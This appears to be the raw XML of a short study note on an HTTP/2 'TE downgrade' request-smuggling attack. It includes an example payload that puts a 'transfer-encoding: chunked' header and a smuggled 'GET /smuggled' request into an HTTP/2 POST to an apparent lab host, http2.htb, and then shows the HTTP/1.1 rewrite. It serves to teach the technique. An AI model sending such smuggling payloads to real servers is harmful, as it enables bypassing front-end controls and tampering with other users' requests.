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6D6C" w14:textId="41DDDC4C" w:rsidR="00213442" w:rsidRDefault="00725773" w:rsidP="00725773">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>H2TE Downgrade Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782EF422" w14:textId="77777777" w:rsidR="00725773" w:rsidRDefault="00725773" w:rsidP="00725773">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D6A8EDA" w14:textId="41ABADC4" w:rsidR="00B726EA" w:rsidRDefault="00725773" w:rsidP="00725773">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This attack targets the HTTP/2 protocol as well but happens when the TE headers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  <w:r w:rsidR="006E6BCC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> thru a </w:t>
      </w:r>
      <w:r w:rsidR="00857EEC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>request,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and it will create a mismatch as we know that chunked mode is not supported by </w:t>
      </w:r>
      <w:r w:rsidR="00B726EA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTTP/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B726EA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B726EA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and it shouldn’t be shipped with.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D58E348" w14:textId="77777777" w:rsidR="00B726EA" w:rsidRDefault="00B726EA" w:rsidP="00725773">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78936652" w14:textId="71A9BABA" w:rsidR="00B726EA" w:rsidRDefault="00B726EA" w:rsidP="00B726EA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exploit Time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00731B3A" w14:textId="77777777" w:rsidR="00B726EA" w:rsidRDefault="00B726EA" w:rsidP="00B726EA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AB8368A" w14:textId="77784406" w:rsidR="00B726EA" w:rsidRDefault="00C31088" w:rsidP="00B726EA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">What if we send the following payload to a frontend that supports HTTP/2 </w:t>
      </w:r>
      <w:r w:rsidR="006E6BCC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>protocol (red are the headers names, green its values and yellow the body payload of the smuggled request)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CC238E" w14:textId="77777777" w:rsidR="006E6BCC" w:rsidRPr="006E6BCC" w:rsidRDefault="006E6BCC" w:rsidP="006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6E6BC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:method</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006E6BCC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r w:rsidRPr="006E6BC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SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7CDF9E" w14:textId="77777777" w:rsidR="006E6BCC" w:rsidRPr="006E6BCC" w:rsidRDefault="006E6BCC" w:rsidP="006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6E6BC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:path</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006E6BCC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r w:rsidRPr="006E6BC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SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039B92DC" w14:textId="77777777" w:rsidR="006E6BCC" w:rsidRPr="006E6BCC" w:rsidRDefault="006E6BCC" w:rsidP="006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6E6BC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:authority</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006E6BCC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r w:rsidRPr="006E6BC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SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>http2.htb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025DA8F7" w14:textId="77777777" w:rsidR="006E6BCC" w:rsidRPr="006E6BCC" w:rsidRDefault="006E6BCC" w:rsidP="006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6E6BC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:scheme</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006E6BCC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r w:rsidRPr="006E6BC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SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E27B131" w14:textId="77777777" w:rsidR="006E6BCC" w:rsidRPr="006E6BCC" w:rsidRDefault="006E6BCC" w:rsidP="006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6E6BC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transfer-encoding</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6BCC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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006E6BC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SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>chunked</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="33C59E1D" w14:textId="77777777" w:rsidR="006E6BCC" w:rsidRPr="006E6BCC" w:rsidRDefault="006E6BCC" w:rsidP="006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</w:pPr>
      <w:r w:rsidRPr="006E6BC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  <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4F8BF0" w14:textId="77777777" w:rsidR="006E6BCC" w:rsidRPr="006E6BCC" w:rsidRDefault="006E6BCC" w:rsidP="006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</w:pPr>
    </w:p>
    <w:p w14:paraId="69B84203" w14:textId="77777777" w:rsidR="006E6BCC" w:rsidRPr="006E6BCC" w:rsidRDefault="006E6BCC" w:rsidP="006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</w:pPr>
      <w:r w:rsidRPr="006E6BC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  <w:t>GET /smuggled HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC96666" w14:textId="77777777" w:rsidR="006E6BCC" w:rsidRPr="006E6BCC" w:rsidRDefault="006E6BCC" w:rsidP="006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</w:pPr>
      <w:r w:rsidRPr="006E6BC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  <w:t>Host: http2.htb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25872A99" w14:textId="77777777" w:rsidR="00C31088" w:rsidRDefault="00C31088" w:rsidP="00B726EA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-SE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BC7F3C4" w14:textId="3539FED3" w:rsidR="006E6BCC" w:rsidRDefault="00857EEC" w:rsidP="00B726EA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In this case if the fronted fails to reject the request with a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TE(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">chunked header) then it will </w:t>
      </w:r>
      <w:r w:rsidR="00FB62CB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">rollback to a HTTP/1 that will be wrongly </w:t>
      </w:r>
      <w:r w:rsidR="005000F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rewritten</w:t>
      </w:r>
      <w:r w:rsidR="00FB62CB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by using the chunked mode and </w:t>
      </w:r>
      <w:r w:rsidR="004438D5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>result in a disconnect attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CAFFAB" w14:textId="3C6A2EC1" w:rsidR="00920497" w:rsidRDefault="00920497" w:rsidP="00B726EA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Resulting to a rewrite into </w:t>
      </w:r>
      <w:r w:rsidR="005000F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2 requests where the first will be trunked and the second will be sent to the backend for execution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC0B98D" w14:textId="77777777" w:rsidR="00920497" w:rsidRDefault="00920497" w:rsidP="00920497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t>POST / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9B4019" w14:textId="77777777" w:rsidR="00920497" w:rsidRDefault="00920497" w:rsidP="00920497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t>Host: http2.htb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F6CBCE" w14:textId="77777777" w:rsidR="00920497" w:rsidRDefault="00920497" w:rsidP="00920497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t xml:space="preserve">Transfer-Encoding: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>chunked</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="23F59E0A" w14:textId="77777777" w:rsidR="00920497" w:rsidRDefault="00920497" w:rsidP="00920497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t>Content-Length: 48</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BCB762" w14:textId="77777777" w:rsidR="00920497" w:rsidRDefault="00920497" w:rsidP="00920497">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02D3E49A" w14:textId="77777777" w:rsidR="00920497" w:rsidRDefault="00920497" w:rsidP="00920497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t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F58BB0" w14:textId="77777777" w:rsidR="00920497" w:rsidRDefault="00920497" w:rsidP="00920497">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07FCAB12" w14:textId="77777777" w:rsidR="00920497" w:rsidRDefault="00920497" w:rsidP="00920497">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="008000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>GET /smuggled HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033B8AA3" w14:textId="77777777" w:rsidR="00920497" w:rsidRDefault="00920497" w:rsidP="00920497">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="008000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>Host: http2.htb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F512E87" w14:textId="77777777" w:rsidR="005000F3" w:rsidRDefault="005000F3" w:rsidP="00920497">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="008000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43FB5303" w14:textId="35CB063C" w:rsidR="005000F3" w:rsidRPr="00920375" w:rsidRDefault="00920375" w:rsidP="00920497">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00920375">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OBS: In this case the TE comes before the CL and will have priority!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036FDC3A" w14:textId="77777777" w:rsidR="00920497" w:rsidRPr="00857EEC" w:rsidRDefault="00920497" w:rsidP="00B726EA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00920497" w:rsidRPr="0085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7"/>
    <w:rsid w:val="00210E47"/>
    <w:rsid w:val="00213442"/>
    <w:rsid w:val="004438D5"/>
    <w:rsid w:val="005000F3"/>
    <w:rsid w:val="006E6BCC"/>
    <w:rsid w:val="00725773"/>
    <w:rsid w:val="00857EEC"/>
    <w:rsid w:val="00920375"/>
    <w:rsid w:val="00920497"/>
    <w:rsid w:val="00B726EA"/>
    <w:rsid w:val="00C31088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6C7A7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{08757C11-D612-4C12-A615-8FB49109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6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26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BCC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6B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11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-09T09:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-09T09:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>